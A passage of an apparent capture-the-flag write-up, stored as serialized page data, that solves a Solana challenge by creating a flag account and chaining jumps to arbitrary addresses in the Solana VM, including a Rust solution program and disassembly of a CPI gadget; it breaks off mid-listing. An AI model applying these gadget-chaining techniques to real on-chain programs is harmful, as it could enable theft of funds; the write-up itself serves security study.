get the flag, we need to make sure that the account at ",{"type":27,"tag":84,"props":50365,"children":50367},{"className":50366},[],[50368],{"type":33,"value":50369},"PDA(\"FLAG\")",{"type":33,"value":50371}," exists, has a data length of 0x1337, and the first 8 bytes are equal to 0x4337.",{"type":27,"tag":36,"props":50373,"children":50374},{},[50375,50377,50384],{"type":33,"value":50376},"Essentially, we need to ",{"type":27,"tag":47,"props":50378,"children":50381},{"href":50379,"rel":50380},"https://docs.solana.com/developing/runtime-facilities/programs#system-program",[51],[50382],{"type":33,"value":50383},"invoke the System Program",{"type":33,"value":50385},", and write controlled data into the newly created account.",{"type":27,"tag":36,"props":50387,"children":50388},{},[50389],{"type":33,"value":50390},"A sample program that does this is as follows:",{"type":27,"tag":101,"props":50392,"children":50394},{"className":10270,"code":50393,"language":10269,"meta":7,"style":7},"pub fn process_instruction(\n program_id: &Pubkey,\n accounts: &[AccountInfo],\n data: &[u8]\n) -> ProgramResult {\n let flag_pda_ai = &accounts[0];\n let user_ai = &accounts[1];\n\n // Step 1: Create a new account with 0x1337 bytes of data\n let instruction = Instruction::new_with_bincode(\n system_program::ID,\n &SystemInstruction::CreateAccount {\n space: 0x1337,\n lamports: Rent::default().minimum_balance(0x1337),\n owner: chall::ID\n },\n vec![\n AccountMeta::new(*user_ai.key, true),\n AccountMeta::new(*flag_pda_ai.key, true),\n ],\n );\n invoke_signed_unchecked(\n &instruction,\n &[\n user_ai.clone(),\n flag_pda_ai.clone(),\n ],\n &[&[\"FLAG\".as_ref()]],\n )?;\n\n // Step 2: Write 0x4337 to the first 8 bytes of the account\n flag_pda_ai.try_borrow_mut_data()?[..8].copy_from_slice(&0x4337u64.to_le_bytes());\n\n Ok(())\n}\n",[50395],{"type":27,"tag":84,"props":50396,"children":50397},{"__ignoreMap":7},[50398,50418,50442,50470,50498,50518,50554,50590,50597,50605,50638,50655,50680,50701,50753,50778,50785,50798,50844,50888,50896,50904,50915,50931,50942,50962,50982,50989,51025,51040,51047,51055,51134,51141,51152],{"type":27,"tag":207,"props":50399,"children":50400},{"class":209,"line":210},[50401,50405,50409,50414],{"type":27,"tag":207,"props":50402,"children":50403},{"style":214},[50404],{"type":33,"value":20967},{"type":27,"tag":207,"props":50406,"children":50407},{"style":214},[50408],{"type":33,"value":20972},{"type":27,"tag":207,"props":50410,"children":50411},{"style":1335},[50412],{"type":33,"value":50413}," process_instruction",{"type":27,"tag":207,"props":50415,"children":50416},{"style":238},[50417],{"type":33,"value":9090},{"type":27,"tag":207,"props":50419,"children":50420},{"class":209,"line":244},[50421,50426,50430,50434,50438],{"type":27,"tag":207,"props":50422,"children":50423},{"style":220},[50424],{"type":33,"value":50425}," program_id",{"type":27,"tag":207,"props":50427,"children":50428},{"style":226},[50429],{"type":33,"value":736},{"type":27,"tag":207,"props":50431,"children":50432},{"style":226},[50433],{"type":33,"value":14423},{"type":27,"tag":207,"props":50435,"children":50436},{"style":8920},[50437],{"type":33,"value":28670},{"type":27,"tag":207,"props":50439,"children":50440},{"style":238},[50441],{"type":33,"value":1842},{"type":27,"tag":207,"props":50443,"children":50444},{"class":209,"line":270},[50445,50450,50454,50458,50462,50466],{"type":27,"tag":207,"props":50446,"children":50447},{"style":220},[50448],{"type":33,"value":50449}," accounts",{"type":27,"tag":207,"props":50451,"children":50452},{"style":226},[50453],{"type":33,"value":736},{"type":27,"tag":207,"props":50455,"children":50456},{"style":226},[50457],{"type":33,"value":14423},{"type":27,"tag":207,"props":50459,"children":50460},{"style":238},[50461],{"type":33,"value":11019},{"type":27,"tag":207,"props":50463,"children":50464},{"style":8920},[50465],{"type":33,"value":22213},{"type":27,"tag":207,"props":50467,"children":50468},{"style":238},[50469],{"type":33,"value":21539},{"type":27,"tag":207,"props":50471,"children":50472},{"class":209,"line":296},[50473,50478,50482,50486,50490,50494],{"type":27,"tag":207,"props":50474,"children":50475},{"style":220},[50476],{"type":33,"value":50477}," data",{"type":27,"tag":207,"props":50479,"children":50480},{"style":226},[50481],{"type":33,"value":736},{"type":27,"tag":207,"props":50483,"children":50484},{"style":226},[50485],{"type":33,"value":14423},{"type":27,"tag":207,"props":50487,"children":50488},{"style":238},[50489],{"type":33,"value":11019},{"type":27,"tag":207,"props":50491,"children":50492},{"style":8920},[50493],{"type":33,"value":10709},{"type":27,"tag":207,"props":50495,"children":50496},{"style":238},[50497],{"type":33,"value":19050},{"type":27,"tag":207,"props":50499,"children":50500},{"class":209,"line":445},[50501,50505,50509,50514],{"type":27,"tag":207,"props":50502,"children":50503},{"style":238},[50504],{"type":33,"value":2222},{"type":27,"tag":207,"props":50506,"children":50507},{"style":226},[50508],{"type":33,"value":8968},{"type":27,"tag":207,"props":50510,"children":50511},{"style":8920},[50512],{"type":33,"value":50513}," ProgramResult",{"type":27,"tag":207,"props":50515,"children":50516},{"style":238},[50517],{"type":33,"value":384},{"type":27,"tag":207,"props":50519,"children":50520},{"class":209,"line":867},[50521,50525,50530,50534,50538,50542,50546,50550],{"type":27,"tag":207,"props":50522,"children":50523},{"style":214},[50524],{"type":33,"value":10290},{"type":27,"tag":207,"props":50526,"children":50527},{"style":220},[50528],{"type":33,"value":50529}," flag_pda_ai",{"type":27,"tag":207,"props":50531,"children":50532},{"style":226},[50533],{"type":33,"value":229},{"type":27,"tag":207,"props":50535,"children":50536},{"style":226},[50537],{"type":33,"value":14423},{"type":27,"tag":207,"props":50539,"children":50540},{"style":220},[50541],{"type":33,"value":21951},{"type":27,"tag":207,"props":50543,"children":50544},{"style":238},[50545],{"type":33,"value":11019},{"type":27,"tag":207,"props":50547,"children":50548},{"style":232},[50549],{"type":33,"value":1660},{"type":27,"tag":207,"props":50551,"children":50552},{"style":238},[50553],{"type":33,"value":38834},{"type":27,"tag":207,"props":50555,"children":50556},{"class":209,"line":892},[50557,50561,50566,50570,50574,50578,50582,50586],{"type":27,"tag":207,"props":50558,"children":50559},{"style":214},[50560],{"type":33,"value":10290},{"type":27,"tag":207,"props":50562,"children":50563},{"style":220},[50564],{"type":33,"value":50565}," user_ai",{"type":27,"tag":207,"props":50567,"children":50568},{"style":226},[50569],{"type":33,"value":229},{"type":27,"tag":207,"props":50571,"children":50572},{"style":226},[50573],{"type":33,"value":14423},{"type":27,"tag":207,"props":50575,"children":50576},{"style":220},[50577],{"type":33,"value":21951},{"type":27,"tag":207,"props":50579,"children":50580},{"style":238},[50581],{"type":33,"value":11019},{"type":27,"tag":207,"props":50583,"children":50584},{"style":232},[50585],{"type":33,"value":1651},{"type":27,"tag":207,"props":50587,"children":50588},{"style":238},[50589],{"type":33,"value":38834},{"type":27,"tag":207,"props":50591,"children":50592},{"class":209,"line":1475},[50593],{"type":27,"tag":207,"props":50594,"children":50595},{"emptyLinePlaceholder":19},[50596],{"type":33,"value":2062},{"type":27,"tag":207,"props":50598,"children":50599},{"class":209,"line":2065},[50600],{"type":27,"tag":207,"props":50601,"children":50602},{"style":4647},[50603],{"type":33,"value":50604}," // Step 1: Create a new account with 0x1337 bytes of data\n",{"type":27,"tag":207,"props":50606,"children":50607},{"class":209,"line":2092},[50608,50612,50617,50621,50625,50629,50634],{"type":27,"tag":207,"props":50609,"children":50610},{"style":214},[50611],{"type":33,"value":10290},{"type":27,"tag":207,"props":50613,"children":50614},{"style":220},[50615],{"type":33,"value":50616}," instruction",{"type":27,"tag":207,"props":50618,"children":50619},{"style":226},[50620],{"type":33,"value":229},{"type":27,"tag":207,"props":50622,"children":50623},{"style":8920},[50624],{"type":33,"value":48256},{"type":27,"tag":207,"props":50626,"children":50627},{"style":226},[50628],{"type":33,"value":10768},{"type":27,"tag":207,"props":50630,"children":50631},{"style":1335},[50632],{"type":33,"value":50633},"new_with_bincode",{"type":27,"tag":207,"props":50635,"children":50636},{"style":238},[50637],{"type":33,"value":9090},{"type":27,"tag":207,"props":50639,"children":50640},{"class":209,"line":2130},[50641,50646,50650],{"type":27,"tag":207,"props":50642,"children":50643},{"style":238},[50644],{"type":33,"value":50645}," system_program",{"type":27,"tag":207,"props":50647,"children":50648},{"style":226},[50649],{"type":33,"value":10768},{"type":27,"tag":207,"props":50651,"children":50652},{"style":238},[50653],{"type":33,"value":50654},"ID,\n",{"type":27,"tag":207,"props":50656,"children":50657},{"class":209,"line":2168},[50658,50662,50667,50671,50676],{"type":27,"tag":207,"props":50659,"children":50660},{"style":226},[50661],{"type":33,"value":10758},{"type":27,"tag":207,"props":50663,"children":50664},{"style":238},[50665],{"type":33,"value":50666},"SystemInstruction",{"type":27,"tag":207,"props":50668,"children":50669},{"style":226},[50670],{"type":33,"value":10768},{"type":27,"tag":207,"props":50672,"children":50673},{"style":8920},[50674],{"type":33,"value":50675},"CreateAccount",{"type":27,"tag":207,"props":50677,"children":50678},{"style":238},[50679],{"type":33,"value":384},{"type":27,"tag":207,"props":50681,"children":50682},{"class":209,"line":4095},[50683,50688,50692,50697],{"type":27,"tag":207,"props":50684,"children":50685},{"style":220},[50686],{"type":33,"value":50687}," space",{"type":27,"tag":207,"props":50689,"children":50690},{"style":226},[50691],{"type":33,"value":736},{"type":27,"tag":207,"props":50693,"children":50694},{"style":232},[50695],{"type":33,"value":50696}," 0x1337",{"type":27,"tag":207,"props":50698,"children":50699},{"style":238},[50700],{"type":33,"value":1842},{"type":27,"tag":207,"props":50702,"children":50703},{"class":209,"line":4103},[50704,50709,50713,50718,50722,50727,50731,50735,50740,50744,50749],{"type":27,"tag":207,"props":50705,"children":50706},{"style":220},[50707],{"type":33,"value":50708}," lamports",{"type":27,"tag":207,"props":50710,"children":50711},{"style":226},[50712],{"type":33,"value":736},{"type":27,"tag":207,"props":50714,"children":50715},{"style":238},[50716],{"type":33,"value":50717}," Rent",{"type":27,"tag":207,"props":50719,"children":50720},{"style":226},[50721],{"type":33,"value":10768},{"type":27,"tag":207,"props":50723,"children":50724},{"style":1335},[50725],{"type":33,"value":50726},"default",{"type":27,"tag":207,"props":50728,"children":50729},{"style":238},[50730],{"type":33,"value":21155},{"type":27,"tag":207,"props":50732,"children":50733},{"style":226},[50734],{"type":33,"value":1041},{"type":27,"tag":207,"props":50736,"children":50737},{"style":1335},[50738],{"type":33,"value":50739},"minimum_balance",{"type":27,"tag":207,"props":50741,"children":50742},{"style":238},[50743],{"type":33,"value":1343},{"type":27,"tag":207,"props":50745,"children":50746},{"style":232},[50747],{"type":33,"value":50748},"0x1337",{"type":27,"tag":207,"props":50750,"children":50751},{"style":238},[50752],{"type":33,"value":14018},{"type":27,"tag":207,"props":50754,"children":50755},{"class":209,"line":4154},[50756,50761,50765,50769,50773],{"type":27,"tag":207,"props":50757,"children":50758},{"style":220},[50759],{"type":33,"value":50760}," owner",{"type":27,"tag":207,"props":50762,"children":50763},{"style":226},[50764],{"type":33,"value":736},{"type":27,"tag":207,"props":50766,"children":50767},{"style":238},[50768],{"type":33,"value":49288},{"type":27,"tag":207,"props":50770,"children":50771},{"style":226},[50772],{"type":33,"value":10768},{"type":27,"tag":207,"props":50774,"children":50775},{"style":238},[50776],{"type":33,"value":50777},"ID\n",{"type":27,"tag":207,"props":50779,"children":50780},{"class":209,"line":4203},[50781],{"type":27,"tag":207,"props":50782,"children":50783},{"style":238},[50784],{"type":33,"value":32638},{"type":27,"tag":207,"props":50786,"children":50787},{"class":209,"line":4249},[50788,50793],{"type":27,"tag":207,"props":50789,"children":50790},{"style":1335},[50791],{"type":33,"value":50792}," vec!",{"type":27,"tag":207,"props":50794,"children":50795},{"style":238},[50796],{"type":33,"value":50797},"[\n",{"type":27,"tag":207,"props":50799,"children":50800},{"class":209,"line":4290},[50801,50806,50810,50814,50818,50822,50827,50831,50836,50840],{"type":27,"tag":207,"props":50802,"children":50803},{"style":238},[50804],{"type":33,"value":50805}," AccountMeta",{"type":27,"tag":207,"props":50807,"children":50808},{"style":226},[50809],{"type":33,"value":10768},{"type":27,"tag":207,"props":50811,"children":50812},{"style":1335},[50813],{"type":33,"value":22397},{"type":27,"tag":207,"props":50815,"children":50816},{"style":238},[50817],{"type":33,"value":1343},{"type":27,"tag":207,"props":50819,"children":50820},{"style":226},[50821],{"type":33,"value":9286},{"type":27,"tag":207,"props":50823,"children":50824},{"style":220},[50825],{"type":33,"value":50826},"user_ai",{"type":27,"tag":207,"props":50828,"children":50829},{"style":226},[50830],{"type":33,"value":1041},{"type":27,"tag":207,"props":50832,"children":50833},{"style":238},[50834],{"type":33,"value":50835},"key, ",{"type":27,"tag":207,"props":50837,"children":50838},{"style":214},[50839],{"type":33,"value":11278},{"type":27,"tag":207,"props":50841,"children":50842},{"style":238},[50843],{"type":33,"value":14018},{"type":27,"tag":207,"props":50845,"children":50846},{"class":209,"line":4304},[50847,50851,50855,50859,50863,50867,50872,50876,50880,50884],{"type":27,"tag":207,"props":50848,"children":50849},{"style":238},[50850],{"type":33,"value":50805},{"type":27,"tag":207,"props":50852,"children":50853},{"style":226},[50854],{"type":33,"value":10768},{"type":27,"tag":207,"props":50856,"children":50857},{"style":1335},[50858],{"type":33,"value":22397},{"type":27,"tag":207,"props":50860,"children":50861},{"style":238},[50862],{"type":33,"value":1343},{"type":27,"tag":207,"props":50864,"children":50865},{"style":226},[50866],{"type":33,"value":9286},{"type":27,"tag":207,"props":50868,"children":50869},{"style":220},[50870],{"type":33,"value":50871},"flag_pda_ai",{"type":27,"tag":207,"props":50873,"children":50874},{"style":226},[50875],{"type":33,"value":1041},{"type":27,"tag":207,"props":50877,"children":50878},{"style":238},[50879],{"type":33,"value":50835},{"type":27,"tag":207,"props":50881,"children":50882},{"style":214},[50883],{"type":33,"value":11278},{"type":27,"tag":207,"props":50885,"children":50886},{"style":238},[50887],{"type":33,"value":14018},{"type":27,"tag":207,"props":50889,"children":50890},{"class":209,"line":5466},[50891],{"type":27,"tag":207,"props":50892,"children":50893},{"style":238},[50894],{"type":33,"value":50895}," ],\n",{"type":27,"tag":207,"props":50897,"children":50898},{"class":209,"line":5530},[50899],{"type":27,"tag":207,"props":50900,"children":50901},{"style":238},[50902],{"type":33,"value":50903}," );\n",{"type":27,"tag":207,"props":50905,"children":50906},{"class":209,"line":7900},[50907,50911],{"type":27,"tag":207,"props":50908,"children":50909},{"style":1335},[50910],{"type":33,"value":48373},{"type":27,"tag":207,"props":50912,"children":50913},{"style":238},[50914],{"type":33,"value":9090},{"type":27,"tag":207,"props":50916,"children":50917},{"class":209,"line":7909},[50918,50922,50927],{"type":27,"tag":207,"props":50919,"children":50920},{"style":226},[50921],{"type":33,"value":10758},{"type":27,"tag":207,"props":50923,"children":50924},{"style":220},[50925],{"type":33,"value":50926},"instruction",{"type":27,"tag":207,"props":50928,"children":50929},{"style":238},[50930],{"type":33,"value":1842},{"type":27,"tag":207,"props":50932,"children":50933},{"class":209,"line":7917},[50934,50938],{"type":27,"tag":207,"props":50935,"children":50936},{"style":226},[50937],{"type":33,"value":10758},{"type":27,"tag":207,"props":50939,"children":50940},{"style":238},[50941],{"type":33,"value":50797},{"type":27,"tag":207,"props":50943,"children":50944},{"class":209,"line":7926},[50945,50950,50954,50958],{"type":27,"tag":207,"props":50946,"children":50947},{"style":220},[50948],{"type":33,"value":50949}," user_ai",{"type":27,"tag":207,"props":50951,"children":50952},{"style":226},[50953],{"type":33,"value":1041},{"type":27,"tag":207,"props":50955,"children":50956},{"style":1335},[50957],{"type":33,"value":22695},{"type":27,"tag":207,"props":50959,"children":50960},{"style":238},[50961],{"type":33,"value":10778},{"type":27,"tag":207,"props":50963,"children":50964},{"class":209,"line":7934},[50965,50970,50974,50978],{"type":27,"tag":207,"props":50966,"children":50967},{"style":220},[50968],{"type":33,"value":50969}," flag_pda_ai",{"type":27,"tag":207,"props":50971,"children":50972},{"style":226},[50973],{"type":33,"value":1041},{"type":27,"tag":207,"props":50975,"children":50976},{"style":1335},[50977],{"type":33,"value":22695},{"type":27,"tag":207,"props":50979,"children":50980},{"style":238},[50981],{"type":33,"value":10778},{"type":27,"tag":207,"props":50983,"children":50984},{"class":209,"line":7943},[50985],{"type":27,"tag":207,"props":50986,"children":50987},{"style":238},[50988],{"type":33,"value":50895},{"type":27,"tag":207,"props":50990,"children":50991},{"class":209,"line":7952},[50992,50996,51000,51004,51008,51012,51016,51020],{"type":27,"tag":207,"props":50993,"children":50994},{"style":226},[50995],{"type":33,"value":10758},{"type":27,"tag":207,"props":50997,"children":50998},{"style":238},[50999],{"type":33,"value":11019},{"type":27,"tag":207,"props":51001,"children":51002},{"style":226},[51003],{"type":33,"value":10398},{"type":27,"tag":207,"props":51005,"children":51006},{"style":238},[51007],{"type":33,"value":11019},{"type":27,"tag":207,"props":51009,"children":51010},{"style":1325},[51011],{"type":33,"value":49868},{"type":27,"tag":207,"props":51013,"children":51014},{"style":226},[51015],{"type":33,"value":1041},{"type":27,"tag":207,"props":51017,"children":51018},{"style":1335},[51019],{"type":33,"value":49877},{"type":27,"tag":207,"props":51021,"children":51022},{"style":238},[51023],{"type":33,"value":51024},"()]],\n",{"type":27,"tag":207,"props":51026,"children":51027},{"class":209,"line":7961},[51028,51032,51036],{"type":27,"tag":207,"props":51029,"children":51030},{"style":238},[51031],{"type":33,"value":10943},{"type":27,"tag":207,"props":51033,"children":51034},{"style":226},[51035],{"type":33,"value":10444},{"type":27,"tag":207,"props":51037,"children":51038},{"style":238},[51039],{"type":33,"value":241},{"type":27,"tag":207,"props":51041,"children":51042},{"class":209,"line":7969},[51043],{"type":27,"tag":207,"props":51044,"children":51045},{"emptyLinePlaceholder":19},[51046],{"type":33,"value":2062},{"type":27,"tag":207,"props":51048,"children":51049},{"class":209,"line":7978},[51050],{"type":27,"tag":207,"props":51051,"children":51052},{"style":4647},[51053],{"type":33,"value":51054}," // Step 2: Write 0x4337 to the first 8 bytes of the account\n",{"type":27,"tag":207,"props":51056,"children":51057},{"class":209,"line":7987},[51058,51063,51067,51071,51075,51079,51083,51087,51091,51095,51099,51104,51108,51112,51117,51121,51125,51130],{"type":27,"tag":207,"props":51059,"children":51060},{"style":220},[51061],{"type":33,"value":51062}," flag_pda_ai",{"type":27,"tag":207,"props":51064,"children":51065},{"style":226},[51066],{"type":33,"value":1041},{"type":27,"tag":207,"props":51068,"children":51069},{"style":1335},[51070],{"type":33,"value":21150},{"type":27,"tag":207,"props":51072,"children":51073},{"style":238},[51074],{"type":33,"value":21155},{"type":27,"tag":207,"props":51076,"children":51077},{"style":226},[51078],{"type":33,"value":10444},{"type":27,"tag":207,"props":51080,"children":51081},{"style":238},[51082],{"type":33,"value":11019},{"type":27,"tag":207,"props":51084,"children":51085},{"style":226},[51086],{"type":33,"value":10340},{"type":27,"tag":207,"props":51088,"children":51089},{"style":232},[51090],{"type":33,"value":3578},{"type":27,"tag":207,"props":51092,"children":51093},{"style":238},[51094],{"type":33,"value":22686},{"type":27,"tag":207,"props":51096,"children":51097},{"style":226},[51098],{"type":33,"value":1041},{"type":27,"tag":207,"props":51100,"children":51101},{"style":1335},[51102],{"type":33,"value":51103},"copy_from_slice",{"type":27,"tag":207,"props":51105,"children":51106},{"style":238},[51107],{"type":33,"value":1343},{"type":27,"tag":207,"props":51109,"children":51110},{"style":226},[51111],{"type":33,"value":10398},{"type":27,"tag":207,"props":51113,"children":51114},{"style":232},[51115],{"type":33,"value":51116},"0x4337",{"type":27,"tag":207,"props":51118,"children":51119},{"style":8920},[51120],{"type":33,"value":15323},{"type":27,"tag":207,"props":51122,"children":51123},{"style":226},[51124],{"type":33,"value":1041},{"type":27,"tag":207,"props":51126,"children":51127},{"style":1335},[51128],{"type":33,"value":51129},"to_le_bytes",{"type":27,"tag":207,"props":51131,"children":51132},{"style":238},[51133],{"type":33,"value":22700},{"type":27,"tag":207,"props":51135,"children":51136},{"class":209,"line":7996},[51137],{"type":27,"tag":207,"props":51138,"children":51139},{"emptyLinePlaceholder":19},[51140],{"type":33,"value":2062},{"type":27,"tag":207,"props":51142,"children":51143},{"class":209,"line":8005},[51144,51148],{"type":27,"tag":207,"props":51145,"children":51146},{"style":8920},[51147],{"type":33,"value":21609},{"type":27,"tag":207,"props":51149,"children":51150},{"style":238},[51151],{"type":33,"value":21614},{"type":27,"tag":207,"props":51153,"children":51154},{"class":209,"line":8013},[51155],{"type":27,"tag":207,"props":51156,"children":51157},{"style":238},[51158],{"type":33,"value":451},{"type":27,"tag":36,"props":51160,"children":51161},{},[51162],{"type":33,"value":51163},"To test this theory, we can execute the program above inside the test environment, and see if we can get the flag:",{"type":27,"tag":36,"props":51165,"children":51166},{},[51167],{"type":27,"tag":126,"props":51168,"children":51171},{"alt":51169,"src":51170},"Screenshot","/posts/jumping-around-in-the-vm/screenshot.png",[],{"type":27,"tag":36,"props":51173,"children":51174},{},[51175],{"type":33,"value":51176},"It works! Now we \"just\" need to find a way to execute the program above, by leveraging the single Instruction call to the program. This is easier said than done. The next section will dive into the details of the Solana VM to understand how we can achieve this.",{"type":27,"tag":28,"props":51178,"children":51180},{"id":51179},"solution-implementation",[51181],{"type":33,"value":51182},"Solution Implementation",{"type":27,"tag":36,"props":51184,"children":51185},{},[51186,51188,51193],{"type":33,"value":51187},"Now that we know what we need to do, let's look at how we can actually do it. We have to code the above program, by chaining together multiple ",{"type":27,"tag":84,"props":51189,"children":51191},{"className":51190},[],[51192],{"type":33,"value":42933},{"type":33,"value":51194}," invocations:",{"type":27,"tag":101,"props":51196,"children":51200},{"className":51197,"code":51198,"language":51199,"meta":7,"style":7},"language-mermaid shiki shiki-themes slack-dark","graph LR\n A[0: entrypoint] --> B[1: process_instruction]\n B --> C[2: process]\n C --> D[3: gadget1]\n C --> E[3: process]\n E --> F[4: gadget2]\n E --> G[...]\n","mermaid",[51201],{"type":27,"tag":84,"props":51202,"children":51203},{"__ignoreMap":7},[51204,51212,51220,51228,51236,51244,51252],{"type":27,"tag":207,"props":51205,"children":51206},{"class":209,"line":210},[51207],{"type":27,"tag":207,"props":51208,"children":51209},{},[51210],{"type":33,"value":51211},"graph LR\n",{"type":27,"tag":207,"props":51213,"children":51214},{"class":209,"line":244},[51215],{"type":27,"tag":207,"props":51216,"children":51217},{},[51218],{"type":33,"value":51219}," A[0: entrypoint] --> B[1: process_instruction]\n",{"type":27,"tag":207,"props":51221,"children":51222},{"class":209,"line":270},[51223],{"type":27,"tag":207,"props":51224,"children":51225},{},[51226],{"type":33,"value":51227}," B --> C[2: process]\n",{"type":27,"tag":207,"props":51229,"children":51230},{"class":209,"line":296},[51231],{"type":27,"tag":207,"props":51232,"children":51233},{},[51234],{"type":33,"value":51235}," C --> D[3: gadget1]\n",{"type":27,"tag":207,"props":51237,"children":51238},{"class":209,"line":445},[51239],{"type":27,"tag":207,"props":51240,"children":51241},{},[51242],{"type":33,"value":51243}," C --> E[3: process]\n",{"type":27,"tag":207,"props":51245,"children":51246},{"class":209,"line":867},[51247],{"type":27,"tag":207,"props":51248,"children":51249},{},[51250],{"type":33,"value":51251}," E --> F[4: gadget2]\n",{"type":27,"tag":207,"props":51253,"children":51254},{"class":209,"line":892},[51255],{"type":27,"tag":207,"props":51256,"children":51257},{},[51258],{"type":33,"value":51259}," E --> G[...]\n",{"type":27,"tag":36,"props":51261,"children":51262},{},[51263],{"type":33,"value":51264},"What are those gadgets? The Solana VM does not enforce that the target of a jump is a valid one, meaning that it's possible to jump to arbitrary addresses!",{"type":27,"tag":36,"props":51266,"children":51267},{},[51268,51270,51276],{"type":33,"value":51269},"To mimic the execution of our solution, we need a gadget that lets us CPI into system_program, with parameters we control. How do we obtain those? We can use ",{"type":27,"tag":47,"props":51271,"children":51273},{"href":47732,"rel":51272},[51],[51274],{"type":33,"value":51275},"Binary Ninja",{"type":33,"value":51277}," to find a suitable gadget for this.",{"type":27,"tag":36,"props":51279,"children":51280},{},[51281,51283,51290],{"type":33,"value":51282},"Before throwing the on-chain program to binja, it's useful to find a way to get symbols for it. One solution is to patch the cargo-build-sbf command to ",{"type":27,"tag":47,"props":51284,"children":51287},{"href":51285,"rel":51286},"https://github.com/solana-labs/solana/blob/4ee5078e5ffdfff36d3f7920217788e2892c1a85/sdk/cargo-build-sbf/src/main.rs#L789",[51],[51288],{"type":33,"value":51289},"skip the strip pass",{"type":33,"value":1041},{"type":27,"tag":58,"props":51292,"children":51294},{"id":51293},"cpi-gadget",[51295],{"type":33,"value":51296},"CPI Gadget",{"type":27,"tag":36,"props":51298,"children":51299},{},[51300,51302,51307,51309,51316,51318,51324],{"type":33,"value":51301},"Looking at the program source, one idea is to look for the cpi gadget around the ",{"type":27,"tag":84,"props":51303,"children":51305},{"className":51304},[],[51306],{"type":33,"value":45542},{"type":33,"value":51308}," function. This function calls into the solana sdk's function ",{"type":27,"tag":47,"props":51310,"children":51313},{"href":51311,"rel":51312},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/program.rs#L295-L310",[51],[51314],{"type":33,"value":51315},"invoke_signed_unchecked",{"type":33,"value":51317},", yielding a powerful gadget at the address ",{"type":27,"tag":84,"props":51319,"children":51321},{"className":51320},[],[51322],{"type":33,"value":51323},"0x100001ba8",{"type":33,"value":1041},{"type":27,"tag":101,"props":51326,"children":51328},{"className":10270,"code":51327,"language":10269,"meta":7,"style":7},"solana_program::program::invoke_signed_unchecked\n100001ba8 79a278ff00000000 ldxdw r2, [r10-136] {var_88}\n100001bb0 79a380ff00000000 ldxdw r3, [r10-128] {var_80}\n100001bb8 79a468ff00000000 ldxdw r4, [r10-152] {var_98}\n100001bc0 79a570ff00000000 ldxdw r5, [r10-144] {var_90}\n100001bc8 8520000020100000 call sol_invoke_signed_rust\n100001bd0 5500040000000000 jne \u003C+4> r0, 0x0\n\n100001bd8 b701000018000000 mov r1, 0x18\n100001be0 79a288ff00000000 ldxdw r2, [r10-120] {var_78}\n100001be8 6312000000000000 stxw [r2-0], r1 {0x18}\n100001bf0 0500030000000000 ja \u003C+3>\n\n100001bf8 79a188ff00000000 ldxdw r1, [r10-120] {var_78}\n100001c00 bf02000000000000 mov r2, r0\n100001c08 8510000075000000 call _ZN94_$LT$solana_program...$u64$GT$$GT$4from17ha0d289b72861b06dE\n\n100001c10 79a2b8ff00000000 ldxdw r2, [r10-72] {var_48}\n100001c18 1502040000000000 jeq \u003C+4> r2, 0x0\n\n100001c20 2702000022000000 mul r2, 0x22\n100001c28 79a1b0ff00000000 ldxdw r1, [r10-80] {var_50}\n100001c30 b703000001000000 mov r3, 0x1\n100001c38 8510000003feffff call __rust_dealloc\n\n100001c40 79a2d0ff00000000 ldxdw r2, [r10-48] {var_30}\n100001c48 1502030000000000 jeq \u003C+3> r2, 0x0\n\n100001c50 79a1c8ff00000000 ldxdw r1, [r10-56] {var_38}\n100001c58 b703000001000000 mov r3, 0x1\n100001c60 85100000fefdffff call __rust_dealloc\n\n100001c68 9500000000000000 exit {__return_addr}\n",[51329],{"type":27,"tag":84,"props":51330,"children":51331},{"__ignoreMap":7},[51332,51357,51412,51463,51515,51566,51589,51636,51643,51675,51726,51782,51816,51823,51872,51902,51977,51984,52034,52080,52087,52118,52169,52199,52221,52228,52279,52324,52331,52381,52409,52430,52437],{"type":27,"tag":207,"props":51333,"children":51334},{"class":209,"line":210},[51335,51339,51343,51348,51352],{"type":27,"tag":207,"props":51336,"children":51337},{"style":238},[51338],{"type":33,"value":20930},{"type":27,"tag":207,"props":51340,"children":51341},{"style":226},[51342],{"type":33,"value":10768},{"type":27,"tag":207,"props":51344,"children":51345},{"style":238},[51346],{"type":33,"value":51347},"program",{"type":27,"tag":207,"props":51349,"children":51350},{"style":226},[51351],{"type":33,"value":10768},{"type":27,"tag":207,"props":51353,"children":51354},{"style":220},[51355],{"type":33,"value":51356},"invoke_signed_unchecked\n",{"type":27,"tag":207,"props":51358,"children":51359},{"class":209,"line":244},[51360,51365,51370,51375,51380,51385,51390,51394,51398,51403,51408],{"type":27,"tag":207,"props":51361,"children":51362},{"style":220},[51363],{"type":33,"value":51364},"100001ba8",{"type":27,"tag":207,"props":51366,"children":51367},{"style":220},[51368],{"type":33,"value":51369}," 79a278ff00000000",{"type":27,"tag":207,"props":51371,"children":51372},{"style":220},[51373],{"type":33,"value":51374}," ldxdw",{"type":27,"tag":207,"props":51376,"children":51377},{"style":220},[51378],{"type":33,"value":51379}," r2",{"type":27,"tag":207,"props":51381,"children":51382},{"style":238},[51383],{"type":33,"value":51384},", [",{"type":27,"tag":207,"props":51386,"children":51387},{"style":220},[51388],{"type":33,"value":51389},"r10",{"type":27,"tag":207,"props":51391,"children":51392},{"style":226},[51393],{"type":33,"value":11611},{"type":27,"tag":207,"props":51395,"children":51396},{"style":232},[51397],{"type":33,"value":2808},{"type":27,"tag":207,"props":51399,"children":51400},{"style":238},[51401],{"type":33,"value":51402},"] {",{"type":27,"tag":207,"props":51404,"children":51405},{"style":220},[51406],{"type":33,"value":51407},"var_88",{"type":27,"tag":207,"props":51409,"children":51410},{"style":238},[51411],{"type":33,"value":451},{"type":27,"tag":207,"props":51413,"children":51414},{"class":209,"line":270},[51415,51420,51425,51429,51434,51438,51442,51446,51450,51454,51459],{"type":27,"tag":207,"props":51416,"children":51417},{"style":220},[51418],{"type":33,"value":51419},"100001bb0",{"type":27,"tag":207,"props":51421,"children":51422},{"style":220},[51423],{"type":33,"value":51424}," 79a380ff00000000",{"type":27,"tag":207,"props":51426,"children":51427},{"style":220},[51428],{"type":33,"value":51374},{"type":27,"tag":207,"props":51430,"children":51431},{"style":220},[51432],{"type":33,"value":51433}," 